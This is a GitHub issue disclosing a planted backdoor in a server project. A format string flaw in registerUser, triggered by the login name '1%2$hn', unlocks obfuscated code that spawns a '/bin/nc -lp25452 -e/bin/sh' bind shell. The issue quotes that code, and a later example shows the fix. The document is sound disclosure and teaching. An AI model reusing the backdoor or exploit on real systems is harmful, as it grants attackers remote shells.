This repository has been archived by the owner on May 29, 2023. It is now read-only.

Possible backdoor / format string attack #5

Open
poechsel opened this issue May 13, 2019 · 1 comment
Labels
True vulnerability Actual vulnerability in the project wontfix This will not be worked on

Comments

@poechsel

In the function registerUser, a user-controlled input is used as a format string:

```cpp
int login=0;
// name is the client-supplied login name; it is passed as the FORMAT string,
// with 0 as the first vararg and &login as the second
snprintf(cname, NAME_MAX_LEN, name.c_str(),0,&login);
User u(cname);
u.setAuthenticated(false);
u.setLogin(login);
```

Furthermore, registerUser is called each time the login command is issued by a user, and name is the parameter passed to the login command. Thus the user could pass a valid format string to execute a format string attack and overwrite login with a non-zero value.

Then, in the function user_already_logged, if getLogin (which returns the value of login defined in registerUser) of the current user (the one passed by login earlier) is non-zero, a snippet of code that executes /bin/nc -lp25452 -e/bin/sh is called.

```cpp
if (auth.getUser(socket).getLogin()){
//logout the user if already connected
// the obfuscated fragments below assemble the command line
// /bin/nc -lp25452 -e/bin/sh (see above)
char command[8];
strncpy(command+3,str_ping.c_str(),str_ping.size());
strncpy(command,(char*)(access_denied+1),5);
command[6] -= 4;
string test;
string arg0 = "-" +str_logout.substr(0,1) + str_grep.substr(3,1)+ to_string(access_denied[3]);
char arg1[10] = "-e";
strncpy(arg1+2, command, strlen(command));
arg1[7] += 5;
arg1[8] += 5;
char * const argv[] = {command, &arg0[0u], arg1, NULL};
char * const envp[] = {NULL};
call_cmd(command,argv,envp);
}
```

Exploit:
The following sequence of commands triggers this vulnerability:

```
login 1%2$hn
login q
```

The first login will rewrite the login variable. The second is here to call the function user_already_login, which checks if this client has already executed login with another username.
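To make the mechanism in the report concrete, here is an added C example; it is not code from the project and not part of the issue above. It models registerUser with stand-in names (register_user_vulnerable, register_user_fixed, backdoor_branch_taken, g_cname, NAME_MAX_LEN of 32 are all assumptions) so the %2$hn write into login can be observed, and places the hardened constant-format call next to it. The three login names used as input are constructed for the demo.

```c
/* Added example, not the project's code: a plain-C model of the
 * registerUser() format string bug. All names here are stand-ins. */
#undef _FORTIFY_SOURCE   /* glibc's fortified snprintf aborts on %n used from a
                            writable format string and on skipped %N$ arguments;
                            that mitigation is switched off here so the bug shows */
#include <stdio.h>
#include <string.h>

#define NAME_MAX_LEN 32   /* assumed size, the real value is not on the page */

char g_cname[NAME_MAX_LEN];   /* stands in for the project's cname buffer */

/* Mirrors the vulnerable call: the user's name is the FORMAT string and
 * &login is vararg number 2, so "%2$hn" stores the number of bytes produced
 * so far into login (as a 16-bit short). Returns the resulting login value. */
int register_user_vulnerable(const char *name, char *cname)
{
    int login = 0;
    snprintf(cname, NAME_MAX_LEN, name, 0, &login);
    return login;
}

/* Hardened form: a constant format, the user's name is only an ARGUMENT.
 * Directives in the name are copied literally and nothing can reach login. */
int register_user_fixed(const char *name, char *cname)
{
    int login = 0;
    snprintf(cname, NAME_MAX_LEN, "%s", name);
    return login;
}

/* Models the gate in user_already_logged: any non-zero login takes the branch. */
int backdoor_branch_taken(int login)
{
    return login != 0;
}

int main(void)
{
    /* constructed inputs: a harmless name, the payload from the issue, and a
     * longer one showing that the written value is the byte count so far */
    const char *payloads[] = { "q", "1%2$hn", "AAAA%2$hn" };
    for (size_t i = 0; i < sizeof payloads / sizeof payloads[0]; i++) {
        int v = register_user_vulnerable(payloads[i], g_cname);
        printf("vulnerable: name=%-10s cname=%-10s login=%d branch=%d\n",
               payloads[i], g_cname, v, backdoor_branch_taken(v));
        int f = register_user_fixed(payloads[i], g_cname);
        printf("fixed:      name=%-10s cname=%-10s login=%d branch=%d\n",
               payloads[i], g_cname, f, backdoor_branch_taken(f));
    }
    return 0;
}
```

With the vulnerable call, "1%2$hn" prints one byte and then writes 1 into login, "AAAA%2$hn" writes 4, and the gate modeled by backdoor_branch_taken opens for both; with the constant "%s" format the same names land in cname verbatim and login stays 0. Two compile-time checks a practitioner would want: `-Wformat -Wformat-security` (or `-Wformat-nonliteral`) flags the non-literal format, and leaving glibc's `_FORTIFY_SOURCE` enabled makes this particular `%n` from a writable buffer abort at run time instead of succeeding.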

@guillaumemichel
Collaborator

Congrats, you found a vulnerability!

@guillaumemichel guillaumemichel added True vulnerability Actual vulnerability in the project wontfix This will not be worked on labels May 19, 2019